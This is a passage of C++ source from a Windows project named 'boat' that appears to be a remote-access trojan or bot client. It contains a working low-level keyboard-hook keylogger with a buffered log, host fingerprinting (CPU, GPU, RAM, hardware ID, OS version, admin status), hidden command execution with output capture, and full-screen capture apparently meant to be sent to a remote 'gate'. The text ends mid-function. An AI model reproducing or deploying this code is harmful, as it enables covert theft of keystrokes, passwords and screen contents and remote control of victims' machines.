77 | //getClipBoard(); //we don't need this shit for now do we?no 78 | //getWindowTitle(); 79 | 80 | shiftModifier = strcmp(szKey, "Shift") == 0; 81 | bool usePrefix = false; 82 | if (shiftModifier) 83 | usePrefix = true; 84 | 85 | usePrefix = usePrefix || (strcmp(szKey, "Shift") == 0 || GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)); 86 | 87 | 88 | if (i == 1) 89 | if ((GetKeyState(VK_CAPITAL) & 0x0001) == 0 && (!GetAsyncKeyState(VK_LSHIFT) && !GetAsyncKeyState(VK_RSHIFT))) 90 | szKey[0] = easytolower(szKey[0]); 91 | 92 | if (strcmp(szKey, "Space") == 0) 93 | if (!GetAsyncKeyState(VK_LMENU) && !GetAsyncKeyState(VK_LCONTROL) && !GetAsyncKeyState(VK_RMENU) && !GetAsyncKeyState(VK_RCONTROL)) 94 | { 95 | i = 1; 96 | strcpy_s(szKey, 256, " "); 97 | } 98 | 99 | if (i > 1 && strcmp(szKey, "Enter") == 0) { 100 | strcpy_s(szKey, 256, "[Enter]\n"); 101 | i += 3; 102 | } 103 | 104 | if (i > 1 && strcmp(szKey, "Backspace") != 0) { 105 | strcpy_s(szKey + strlen(szKey), 256 - strlen(szKey), "\n"); 106 | i += 1; 107 | } 108 | else if (i > 1 && strcmp(szKey, "Backspace") == 0) { 109 | i = -1; 110 | } 111 | 112 | char* newBuffer = szKey; 113 | 114 | if (usePrefix && i > 1) 115 | { 116 | newBuffer = (char*)malloc(500); 117 | sprintf_s(newBuffer, 500, "%s+%s", "Shift", szKey); 118 | } 119 | else if (i == 1) { 120 | shiftModifier = false; 121 | } 122 | if (!shiftModifier) WriteLog(newBuffer, i); 123 | 124 | if (newBuffer != szKey) 125 | free(newBuffer); 126 | } 127 | 128 | return CallNextHookEx(hKeyHook, nCode, wParam, lParam); 129 | } 130 | 131 | void MsgLoop() 132 | { 133 | MSG message; 134 | while (isLogging) { 135 | bool hasMessage = GetMessage(&message, NULL, 0, 0); 136 | if (hasMessage) { 137 | TranslateMessage(&message); 138 | DispatchMessage(&message); 139 | } 140 | } 141 | } 142 | 143 | DWORD WINAPI StartLoggerInvoker(LPVOID lpParameter) { 144 | hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)KeyEvent, (HINSTANCE)lpParameter, NULL); 145 | MsgLoop(); 146 | return 0; 147 | } 148 | 149 | bool StartLogger() { 150 | if (KeylogBuffer == 0) KeylogBuffer = (char*)malloc(KEYLOG_BUFFER_SIZE); 151 | if (isLogging) return true; 152 | HINSTANCE hExe = GetModuleHandle(NULL); 153 | if (!hExe) return 1; 154 | 155 | CreateThread(NULL, NULL, StartLoggerInvoker, (LPVOID)hExe, NULL, NULL); 156 | 157 | isLogging = true; 158 | return isLogging; 159 | } 160 | 161 | bool StopLogger() { 162 | if (!isLogging) return true; 163 | 164 | isLogging = !UnhookWindowsHookEx(hKeyHook); 165 | 166 | return !isLogging; 167 | } -------------------------------------------------------------------------------- /boat/Keylogger.h: -------------------------------------------------------------------------------- 1 | #ifndef KEYLOGGER_H 2 | #define KEYLOGGER_H 3 | 4 | char* FlushKeylogBuffer(int* length); 5 | void FreeFlushKeylogBufferResult(char* data); 6 | 7 | bool StartLogger(); 8 | bool StopLogger(); 9 | bool IsKeylogging(); 10 | 11 | #endif -------------------------------------------------------------------------------- /boat/OSCpuChecker.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "OSCpuChecker.h" 5 | 6 | bool getCpuName(char* str, int buffferLenght) 7 | { 8 | // Get extended ids. 9 | int CPUInfo[4] = { -1 }; 10 | __cpuid(CPUInfo, 0x80000000); 11 | unsigned int nExIds = CPUInfo[0]; 12 | 13 | // Get the information associated with each extended ID. 14 | char CPUBrandString[0x40] = { 0 }; 15 | for (unsigned int i = 0x80000000; i <= nExIds; ++i) 16 | { 17 | __cpuid(CPUInfo, i); 18 | 19 | // Interpret CPU brand string and cache information. 20 | if (i == 0x80000002) 21 | { 22 | memcpy(CPUBrandString, 23 | CPUInfo, 24 | sizeof(CPUInfo)); 25 | } 26 | else if (i == 0x80000003) 27 | { 28 | memcpy(CPUBrandString + 16, 29 | CPUInfo, 30 | sizeof(CPUInfo)); 31 | } 32 | else if (i == 0x80000004) 33 | { 34 | memcpy(CPUBrandString + 32, CPUInfo, sizeof(CPUInfo)); 35 | } 36 | 37 | /*SYSTEM_INFO si; 38 | ZeroMemory(&si, sizeof(SYSTEM_INFO)); 39 | GetSystemInfo(&si); 40 | __asm {int 3}*/ 41 | } 42 | strcpy(str, CPUBrandString); 43 | return true; 44 | } -------------------------------------------------------------------------------- /boat/OSCpuChecker.h: -------------------------------------------------------------------------------- 1 | #ifndef OSCPUCHECKER_H 2 | #define OSCPUCHECKER_H 3 | 4 | bool getCpuName(char* str, int buffferLenght); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/OSGetRam.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "OSGetRam.h" 5 | 6 | bool getram(char* str, int bufferLength) 7 | { 8 | unsigned long long rams; 9 | GetPhysicallyInstalledSystemMemory(&rams); 10 | _itoa(rams, str, 10); 11 | return true; 12 | } -------------------------------------------------------------------------------- /boat/OSGetRam.h: -------------------------------------------------------------------------------- 1 | #ifndef OSGETRAM_H 2 | #define OSGETRAM_H 3 | 4 | bool getram(char* str, int buffferLenght); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/OSGpuChecker.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #define _WIN32_DCOM 4 | #include 5 | using namespace std; 6 | #include 7 | #include 8 | # pragma comment(lib, "wbemuuid.lib") 9 | 10 | bool getGpuName(char* str, int bufferLength) 11 | { 12 | ZeroMemory(str, bufferLength); 13 | HRESULT hres; 14 | hres = CoInitializeEx(0, COINIT_MULTITHREADED); 15 | if (FAILED(hres)) return 0; 16 | hres = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL); 17 | if (FAILED(hres)) { CoUninitialize(); return 0; } 18 | IWbemLocator *pLoc = NULL; 19 | hres = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID *)&pLoc); 20 | if (FAILED(hres)) { CoUninitialize(); return 0; } 21 | IWbemServices *pSvc = NULL; 22 | hres = pLoc->ConnectServer(_bstr_t(L"root\\CIMV2"), NULL, NULL, 0, NULL, 0, 0, &pSvc); 23 | if (FAILED(hres)) { pLoc->Release(); CoUninitialize(); return 0; } 24 | hres = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE); 25 | if (FAILED(hres)) { pSvc->Release(); pLoc->Release(); CoUninitialize(); return 0; } 26 | IEnumWbemClassObject* pEnumerator = NULL; 27 | hres = pSvc->ExecQuery(bstr_t("WQL"), 28 | bstr_t("SELECT * FROM Win32_VideoController"), 29 | WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator); 30 | if (FAILED(hres)) { pSvc->Release(); pLoc->Release(); CoUninitialize(); return 0; } 31 | IWbemClassObject *pclsObj = (IWbemClassObject*)malloc(sizeof(IWbemClassObject)); 32 | 33 | ULONG uReturn = 0; 34 | bool passed = false; 35 | while (pEnumerator) 36 | { 37 | HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn); 38 | if (0 == uReturn)break; 39 | VARIANT vtProp; 40 | hr = pclsObj->Get(L"Caption", 0, &vtProp, 0, 0); 41 | std::wstring wGpuName = vtProp.bstrVal; 42 | int size_needed = WideCharToMultiByte(CP_UTF8, 0, &wGpuName[0], (int)wGpuName.size(), NULL, 0, NULL, NULL); 43 | std::string strTo(size_needed, 0); 44 | WideCharToMultiByte(CP_UTF8, 0, &wGpuName[0], (int)wGpuName.size(), &strTo[0], size_needed, NULL, NULL); 45 | if(!passed) 46 | strcpy(str, strTo.c_str()); 47 | else 48 | strcpy(str + size_needed, strTo.c_str()); 49 | passed = true; 50 | //wcout << " OS Name : " << vtProp.bstrVal << endl; 51 | VariantClear(&vtProp); 52 | } 53 | pSvc->Release(); 54 | pLoc->Release(); 55 | pEnumerator->Release(); 56 | pclsObj->Release(); 57 | CoUninitialize(); 58 | 59 | //free(pclsObj); 60 | 61 | return 0; 62 | } -------------------------------------------------------------------------------- /boat/OSGpuChecker.h: -------------------------------------------------------------------------------- 1 | #ifndef OSGPUCHECKER_H 2 | #define OSGPUCHECKER_H 3 | 4 | bool getGpuName(char* str, int buffferLenght); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/OSHwidChecker.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "OSHwidChecker.h" 5 | 6 | bool getHwid(char* str, int bufferSize) 7 | { 8 | HW_PROFILE_INFOA hpi; 9 | ZeroMemory(&hpi, sizeof(HW_PROFILE_INFOA)); 10 | GetCurrentHwProfileA(&hpi); 11 | strcpy(str, hpi.szHwProfileGuid); 12 | return true; 13 | } -------------------------------------------------------------------------------- /boat/OSHwidChecker.h: -------------------------------------------------------------------------------- 1 | #ifndef OSHWIDCHECKER_H 2 | #define OSHWIDCHECKER_H 3 | 4 | bool getHwid(char* str, int bufferSize); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/OSNetVersionChecker.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "OSNetVersionChecker.h" 5 | #pragma comment (lib, "Advapi32.lib"); 6 | 7 | #define MAX_KEY_LENGTH 255 8 | #define MAX_VALUE_NAME 16383 9 | 10 | bool QueryKey(HKEY hKey, char* netVer) 11 | { 12 | TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name 13 | DWORD cbName; // size of name string 14 | TCHAR achClass[MAX_PATH] = TEXT(""); // buffer for class name 15 | DWORD cchClassName = MAX_PATH; // size of class string 16 | DWORD cSubKeys = 0; // number of subkeys 17 | DWORD cbMaxSubKey; // longest subkey size 18 | DWORD cchMaxClass; // longest class string 19 | DWORD cValues; // number of values for key 20 | DWORD cchMaxValue; // longest value name 21 | DWORD cbMaxValueData; // longest value data 22 | DWORD cbSecurityDescriptor; // size of security descriptor 23 | FILETIME ftLastWriteTime; // last write time 24 | 25 | DWORD i, retCode; 26 | 27 | TCHAR achValue[MAX_VALUE_NAME]; 28 | DWORD cchValue = MAX_VALUE_NAME; 29 | 30 | // Get the class name and the value count. 31 | retCode = RegQueryInfoKey( 32 | hKey, // key handle 33 | achClass, // buffer for class name 34 | &cchClassName, // size of class string 35 | NULL, // reserved 36 | &cSubKeys, // number of subkeys 37 | &cbMaxSubKey, // longest subkey size 38 | &cchMaxClass, // longest class string 39 | &cValues, // number of values for this key 40 | &cchMaxValue, // longest value name 41 | &cbMaxValueData, // longest value data 42 | &cbSecurityDescriptor, // security descriptor 43 | &ftLastWriteTime); // last write time 44 | 45 | // Enumerate the subkeys, until RegEnumKeyEx fails. 46 | 47 | if (cSubKeys) 48 | { 49 | cbName = MAX_KEY_LENGTH; 50 | retCode = RegEnumKeyEx(hKey, cSubKeys - 1, 51 | achKey, 52 | &cbName, 53 | NULL, 54 | NULL, 55 | NULL, 56 | &ftLastWriteTime); 57 | if (retCode == ERROR_SUCCESS) 58 | { 59 | std::wstring wArchKey = achKey; 60 | int size_needed = WideCharToMultiByte(CP_UTF8, 0, &wArchKey[0], (int)wArchKey.size(), NULL, 0, NULL, NULL); 61 | std::string strTo(size_needed, 0); 62 | WideCharToMultiByte(CP_UTF8, 0, &wArchKey[0], (int)wArchKey.size(), &strTo[0], size_needed, NULL, NULL); 63 | 64 | strcpy(netVer, strTo.c_str()); 65 | 66 | return true; 67 | } 68 | 69 | } 70 | return false; 71 | } 72 | bool getLastestNETinstalled(char* str, int bufferLenght) 73 | { 74 | HKEY hTestKey; 75 | char* netVer = (char*)malloc(bufferLenght); 76 | 77 | if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, 78 | TEXT("SOFTWARE\\Microsoft\\NET Framework Setup\\NDP"), 79 | 0, 80 | KEY_READ, 81 | &hTestKey) == ERROR_SUCCESS 82 | ) 83 | { 84 | QueryKey(hTestKey, netVer); 85 | strcpy(str, netVer); 86 | } 87 | 88 | RegCloseKey(hTestKey); 89 | 90 | free(netVer); 91 | 92 | return true; 93 | 94 | } -------------------------------------------------------------------------------- /boat/OSNetVersionChecker.h: -------------------------------------------------------------------------------- 1 | #ifndef OSNETVERSIONCHECKER_H 2 | #define OSNETVERSIONCHECKER_H 3 | 4 | bool getLastestNETinstalled(char* str, int buffferLenght); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/OSVersionChecker.cpp: -------------------------------------------------------------------------------- 1 | #define _CRT_OBSOLETE_NO_WARNINGS 2 | #include 3 | #include 4 | #include 5 | #include "OSVersionChecker.h" 6 | 7 | typedef void (WINAPI *PGNSI)(LPSYSTEM_INFO); 8 | typedef BOOL(WINAPI *PGPI)(DWORD, DWORD, DWORD, DWORD, PDWORD); 9 | #define PRODUCT_PROFESSIONAL 0x00000030 10 | #define VER_SUITE_WH_SERVER 0x00008000 11 | 12 | bool windowsVersionName(char* str, int bufferSize) { 13 | OSVERSIONINFOEXA osvi; 14 | SYSTEM_INFO si; 15 | BOOL bOsVersionInfoEx; 16 | DWORD dwType; ZeroMemory(&si, sizeof(SYSTEM_INFO)); 17 | ZeroMemory(&osvi, sizeof(OSVERSIONINFOEXA)); 18 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXA); 19 | bOsVersionInfoEx = GetVersionExA((OSVERSIONINFOA*)&osvi); 20 | 21 | PGNSI pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "GetNativeSystemInfo"); 22 | if (NULL != pGNSI) 23 | pGNSI(&si); 24 | else GetSystemInfo(&si); // Check for unsupported OS 25 | if (VER_PLATFORM_WIN32_NT != osvi.dwPlatformId || osvi.dwMajorVersion <= 4) { 26 | return false; 27 | } std::stringstream os; 28 | os << "Microsoft "; // Test for the specific product. if ( osvi.dwMajorVersion == 6 ) 29 | { 30 | if (osvi.dwMinorVersion == 0) 31 | { 32 | if (osvi.wProductType == VER_NT_WORKSTATION) 33 | os << "Windows Vista "; 34 | else os << "Windows Server 2008 "; 35 | } if (osvi.dwMinorVersion == 1) 36 | { 37 | if (osvi.wProductType == VER_NT_WORKSTATION) 38 | os << "Windows 7 "; 39 | else os << "Windows Server 2008 R2 "; 40 | } PGPI pGPI = (PGPI)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "GetProductInfo"); 41 | pGPI(osvi.dwMajorVersion, osvi.dwMinorVersion, 0, 0, &dwType); switch (dwType) 42 | { 43 | case PRODUCT_ULTIMATE: 44 | os << "Ultimate Edition"; 45 | break; 46 | case PRODUCT_PROFESSIONAL: 47 | os << "Professional"; 48 | break; 49 | case PRODUCT_HOME_PREMIUM: 50 | os << "Home Premium Edition"; 51 | break; 52 | case PRODUCT_HOME_BASIC: 53 | os << "Home Basic Edition"; 54 | break; 55 | case PRODUCT_ENTERPRISE: 56 | os << "Enterprise Edition"; 57 | break; 58 | case PRODUCT_BUSINESS: 59 | os << "Business Edition"; 60 | break; 61 | case PRODUCT_STARTER: 62 | os << "Starter Edition"; 63 | break; 64 | case PRODUCT_CLUSTER_SERVER: 65 | os << "Cluster Server Edition"; 66 | break; 67 | case PRODUCT_DATACENTER_SERVER: 68 | os << "Datacenter Edition"; 69 | break; 70 | case PRODUCT_DATACENTER_SERVER_CORE: 71 | os << "Datacenter Edition (core installation)"; 72 | break; 73 | case PRODUCT_ENTERPRISE_SERVER: 74 | os << "Enterprise Edition"; 75 | break; 76 | case PRODUCT_ENTERPRISE_SERVER_CORE: 77 | os << "Enterprise Edition (core installation)"; 78 | break; 79 | case PRODUCT_ENTERPRISE_SERVER_IA64: 80 | os << "Enterprise Edition for Itanium-based Systems"; 81 | break; 82 | case PRODUCT_SMALLBUSINESS_SERVER: 83 | os << "Small Business Server"; 84 | break; 85 | case PRODUCT_SMALLBUSINESS_SERVER_PREMIUM: 86 | os << "Small Business Server Premium Edition"; 87 | break; 88 | case PRODUCT_STANDARD_SERVER: 89 | os << "Standard Edition"; 90 | break; 91 | case PRODUCT_STANDARD_SERVER_CORE: 92 | os << "Standard Edition (core installation)"; 93 | break; 94 | case PRODUCT_WEB_SERVER: 95 | os << "Web Server Edition"; 96 | break; 97 | } 98 | } if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2) 99 | { 100 | if (GetSystemMetrics(SM_SERVERR2)) 101 | os << "Windows Server 2003 R2, "; 102 | else if (osvi.wSuiteMask & VER_SUITE_STORAGE_SERVER) 103 | os << "Windows Storage Server 2003"; 104 | else if (osvi.wSuiteMask & VER_SUITE_WH_SERVER) 105 | os << "Windows Home Server"; 106 | else if (osvi.wProductType == VER_NT_WORKSTATION && 107 | si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64) 108 | { 109 | os << "Windows XP Professional x64 Edition"; 110 | } 111 | else os << "Windows Server 2003, "; // Test for the server type. 112 | if (osvi.wProductType != VER_NT_WORKSTATION) 113 | { 114 | if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_IA64) 115 | { 116 | if (osvi.wSuiteMask & VER_SUITE_DATACENTER) 117 | os << "Datacenter Edition for Itanium-based Systems"; 118 | else if (osvi.wSuiteMask & VER_SUITE_ENTERPRISE) 119 | os << "Enterprise Edition for Itanium-based Systems"; 120 | } 121 | else if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64) 122 | { 123 | if (osvi.wSuiteMask & VER_SUITE_DATACENTER) 124 | os << "Datacenter x64 Edition"; 125 | else if (osvi.wSuiteMask & VER_SUITE_ENTERPRISE) 126 | os << "Enterprise x64 Edition"; 127 | else os << "Standard x64 Edition"; 128 | } 129 | else 130 | { 131 | if (osvi.wSuiteMask & VER_SUITE_COMPUTE_SERVER) 132 | os << "Compute Cluster Edition"; 133 | else if (osvi.wSuiteMask & VER_SUITE_DATACENTER) 134 | os << "Datacenter Edition"; 135 | else if (osvi.wSuiteMask & VER_SUITE_ENTERPRISE) 136 | os << "Enterprise Edition"; 137 | else if (osvi.wSuiteMask & VER_SUITE_BLADE) 138 | os << "Web Edition"; 139 | else os << "Standard Edition"; 140 | } 141 | } 142 | } if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) 143 | { 144 | os << "Windows XP "; 145 | if (osvi.wSuiteMask & VER_SUITE_PERSONAL) 146 | os << "Home Edition"; 147 | else os << "Professional"; 148 | } if (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0) 149 | { 150 | os << "Windows 2000 "; if (osvi.wProductType == VER_NT_WORKSTATION) 151 | { 152 | os << "Professional"; 153 | } 154 | else 155 | { 156 | if (osvi.wSuiteMask & VER_SUITE_DATACENTER) 157 | os << "Datacenter Server"; 158 | else if (osvi.wSuiteMask & VER_SUITE_ENTERPRISE) 159 | os << "Advanced Server"; 160 | else os << "Server"; 161 | } 162 | } if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) { 163 | if (osvi.wProductType != VER_NT_WORKSTATION) 164 | os << "Server 2012"; 165 | else 166 | os << "Windows 8"; 167 | if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64) 168 | os << " x64 Edition"; 169 | 170 | }if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 3) { 171 | if (osvi.wProductType != VER_NT_WORKSTATION) 172 | os << "Server 2012 R2"; 173 | else 174 | os << "Windows 8.1"; 175 | 176 | if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64) 177 | os << " x64 Edition"; 178 | }if (osvi.dwMajorVersion == 10 && osvi.dwMinorVersion == 0) { 179 | if (osvi.wProductType != VER_NT_WORKSTATION) 180 | os << "Windows Server 2016 Technical Preview"; 181 | else 182 | os << "Windows 10"; 183 | 184 | if (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64) 185 | os << " x64 Edition"; 186 | } 187 | strcpy(str, os.str().c_str()); 188 | return true; 189 | } -------------------------------------------------------------------------------- /boat/OSVersionChecker.h: -------------------------------------------------------------------------------- 1 | #ifndef OSVERSIONCHECKER_H 2 | #define OSVERSIONCHECKER_H 3 | 4 | bool windowsVersionName(char* str, int bufferSize); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/PEIsAdmin.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "PEIsAdmin.h" 5 | 6 | bool check(char* str, int buffferLenght) 7 | { 8 | bool fRet = false; 9 | HANDLE hToken = NULL; 10 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 11 | TOKEN_ELEVATION Elevation; 12 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 13 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 14 | fRet = Elevation.TokenIsElevated; 15 | } 16 | } 17 | if (hToken) { 18 | CloseHandle(hToken); 19 | } 20 | 21 | if(fRet) 22 | strcpy(str, "true"); 23 | else 24 | strcpy(str, "false"); 25 | 26 | return fRet; 27 | } -------------------------------------------------------------------------------- /boat/PeIsAdmin.h: -------------------------------------------------------------------------------- 1 | #ifndef PEISADMIN_H 2 | #define PEISADMIN_H 3 | 4 | bool check(char* str, int buffferLenght); 5 | 6 | #endif -------------------------------------------------------------------------------- /boat/Processes.cpp: -------------------------------------------------------------------------------- 1 | #include "Processes.h" 2 | #include 3 | #include 4 | 5 | char* GetProcessResult(char* processName, char* args, int* len) { 6 | char* returnValue = (char*)0; 7 | STARTUPINFOA si; 8 | PROCESS_INFORMATION pi; 9 | 10 | ZeroMemory(&si, sizeof(si)); 11 | ZeroMemory(&pi, sizeof(pi)); 12 | 13 | si.dwFlags = STARTF_USESTDHANDLES; 14 | si.cb = sizeof(STARTUPINFOA); 15 | 16 | SECURITY_ATTRIBUTES saAttr; 17 | saAttr.nLength = sizeof(SECURITY_ATTRIBUTES); 18 | saAttr.bInheritHandle = TRUE; 19 | saAttr.lpSecurityDescriptor = NULL; 20 | 21 | HANDLE stdOut_read, stdOut_write; 22 | CreatePipe(&stdOut_read, &stdOut_write, &saAttr, 0); 23 | 24 | HANDLE stdIn_read, stdIn_write; 25 | CreatePipe(&stdIn_read, &stdIn_write, &saAttr, 0); 26 | 27 | SetHandleInformation(stdOut_read, HANDLE_FLAG_INHERIT, 0); 28 | 29 | SetHandleInformation(stdIn_write, HANDLE_FLAG_INHERIT, 0); 30 | 31 | si.hStdError = stdOut_write; 32 | si.hStdOutput = stdOut_write; 33 | si.hStdInput = stdIn_read; 34 | 35 | char* buffer = (char*)malloc(512); 36 | int currentSize = 0; 37 | if (CreateProcessA(processName, args, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)){ 38 | DWORD exitCode; 39 | do { 40 | GetExitCodeProcess(pi.hProcess, &exitCode); 41 | } while (exitCode == STILL_ACTIVE); 42 | 43 | DWORD read; 44 | while (true) { 45 | bool bResult = ReadFile(stdOut_read, (LPVOID)buffer, 512, &read, NULL); 46 | if (read == 0 || !bResult) //hackish, try to resolve later 47 | break; 48 | 49 | if (returnValue == 0) returnValue = (char*)malloc(read + 1); 50 | else 51 | returnValue = (char*)realloc(returnValue, read + currentSize + 1); 52 | 53 | returnValue[currentSize + read] = 0; 54 | memcpy_s(returnValue + currentSize, read, buffer, read); 55 | 56 | currentSize += read; 57 | 58 | if (read < 512) 59 | break; 60 | } 61 | 62 | } 63 | 64 | free(buffer); 65 | 66 | CloseHandle(stdIn_read); 67 | CloseHandle(stdOut_read); 68 | CloseHandle(stdIn_write); 69 | CloseHandle(stdOut_write); 70 | 71 | *len = (returnValue ? currentSize : 25); 72 | return (returnValue ? returnValue : "Could not start process."); 73 | } 74 | 75 | bool StartProcess(char* processName, char* args) { 76 | char* returnValue = (char*)0; 77 | STARTUPINFOA si; 78 | PROCESS_INFORMATION pi; 79 | 80 | ZeroMemory(&si, sizeof(si)); 81 | ZeroMemory(&pi, sizeof(pi)); 82 | 83 | si.cb = sizeof(STARTUPINFOA); 84 | 85 | if (CreateProcessA(processName, args, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { 86 | return true; 87 | } 88 | 89 | return false; 90 | } 91 | 92 | void FreeProcessResult(char* data) { 93 | if (data) free(data); 94 | } -------------------------------------------------------------------------------- /boat/Processes.h: -------------------------------------------------------------------------------- 1 | #ifndef PROCESSES_H 2 | #define PROCESSES_H 3 | 4 | char* GetProcessResult(char* processName, char* args, int* size); 5 | void FreeProcessResult(char* data); 6 | 7 | bool StartProcess(char* processName, char* args); 8 | 9 | #endif -------------------------------------------------------------------------------- /boat/Screenshot.cpp: -------------------------------------------------------------------------------- 1 | #include "Screenshot.h" 2 | #include "Sockets.h" 3 | #include "GateHelper.h" 4 | 5 | #include 6 | 7 | char* CaptureScreenshot(int* length) { 8 | HDC hdcScr, hdcMem; 9 | 10 | HBITMAP hBitmap; 11 | BITMAP bmp; 12 | 13 | int xRes, yRes; 14 | 15 | hdcScr = CreateDCA("DISPLAY", NULL, NULL, NULL); 16 | hdcMem = CreateCompatibleDC(hdcScr); 17 | 18 | xRes = GetDeviceCaps(hdcScr, HORZRES); 19 | yRes = GetDeviceCaps(hdcScr, VERTRES); 20 | 21 | hBitmap = CreateCompatibleBitmap(hdcScr, xRes, yRes); 22 | 23 | if (hBitmap == 0) return NULL; 24 | 25 | if (!SelectObject(hdcMem, hBitmap)) return NULL; 26 | 27 | if (!StretchBlt(hdcMem, 0, 0, xRes, yRes, hdcScr, 0, 0, xRes, yRes, SRCCOPY)) 28 | return NULL; 29 | 30 | PBITMAPINFO pbmi; 31 | WORD cClrBits; 32 | 33 | if (!GetObject(hBitmap, sizeof(BITMAP), (LPSTR)&bmp)) 34 | return NULL; 35 | 36 | cClrBits = (WORD)(bmp.bmPlanes * bmp.bmBitsPixel); 37 | 38 | if (cClrBits == 1) 39 | cClrBits = 1; 40 | else if (cClrBits <= 4) 41 | cClrBits = 4; 42 | else if (cClrBits <= 8) 43 | cClrBits = 8; 44 | else if (cClrBits <= 16) 45 | cClrBits = 16; 46 | else if (cClrBits <= 24) 47 | cClrBits = 24; 48 | else 49 | cClrBits = 32; 50 | 51 | if (cClrBits != 24) 52 | pbmi = (PBITMAPINFO)LocalAlloc(LPTR, sizeof(BITMAPINFOHEADER) + sizeof(RGBQUAD) * (1 << cClrBits)); 53 | else 54 | pbmi = (PBITMAPINFO)LocalAlloc(LPTR, sizeof(BITMAPINFOHEADER)); 55 | 56 | pbmi->bmiHeader.biSize = sizeof(BITMAPINFOHEADER); 57 | 58 | pbmi->bmiHeader.biWidth = bmp.bmWidth; 59 | pbmi->bmiHeader.biHeight = bmp.bmHeight; 60 | pbmi->bmiHeader.biPlanes = bmp.bmPlanes; 61 | pbmi->bmiHeader.biBitCount = bmp.bmBitsPixel; 62 | 63 | pbmi->bmiHeader.biCompression = BI_RGB; 64 | pbmi->bmiHeader.biSizeImage = (pbmi->bmiHeader.biWidth + 7) / 8 * pbmi->bmiHeader.biHeight * cClrBits; 65 | 66 | pbmi->bmiHeader.biClrImportant = 0; 67 | 68 | BITMAPFILEHEADER hdr; 69 | PBITMAPINFOHEADER pbih; 70 | 71 | DWORD dwTotal; 72 | DWORD cb; 73 | char* lpBits; 74 | char* hp; 75 | 76 | DWORD dwTmp; 77 | 78 | pbih = (PBITMAPINFOHEADER)pbmi; 79 | lpBits = (char*)GlobalAlloc(GMEM_FIXED, pbih->biSizeImage); 80 | 81 | if (!lpBits) return NULL; 82 | 83 | if (!GetDIBits(hdcMem, hBitmap, 0, (WORD)pbih->biHeight, lpBits, pbmi, DIB_RGB_COLORS)) 84 | { 85 | GlobalFree(lpBits); 86 | return NULL; 87 | } 88 | 89 | 90 | hdr.bfType = 0x4d42; 91 | 92 | hdr.bfSize = (DWORD)(sizeof(BITMAPFILEHEADER) + pbih->biSize + pbih->biClrUsed * sizeof(RGBQUAD) + pbih->biSizeImage); 93 | 94 | hdr.bfReserved1 = 0; 95 | hdr.bfReserved2 = 0; 96 | 97 | hdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + pbih->biSize + pbih->biClrUsed * sizeof(RGBQUAD); 98 | 99 | cb = pbih->biSizeImage; 100 | 101 | DWORD dwSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + pbih->biClrUsed * sizeof(RGBQUAD); 102 | dwSize += cb; 103 | 104 | char* image = (char*)GlobalAlloc(GMEM_FIXED, dwSize); 105 | memcpy_s(image, dwSize, &hdr, sizeof(BITMAPFILEHEADER)); 106 | memcpy_s(image + sizeof(BITMAPFILEHEADER), dwSize - sizeof(BITMAPFILEHEADER), pbih, sizeof(BITMAPINFOHEADER)); 107 | memcpy_s(image + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER), dwSize - sizeof(BITMAPFILEHEADER) - sizeof(BITMAPINFOHEADER), lpBits, cb); 108 | 109 | GlobalFree((HGLOBAL)lpBits); 110 | 111 | ReleaseDC(0, hdcScr); 112 | ReleaseDC(0, hdcMem); 113 | 114 | *length = dwSize; 115 | return image; 116 | } 117 | 118 | void FreeScreenshot(char* data) { 119 | GlobalFree((HGLOBAL)data); 120 | } 121 | 122 | bool SendScreenshot(char* destination, 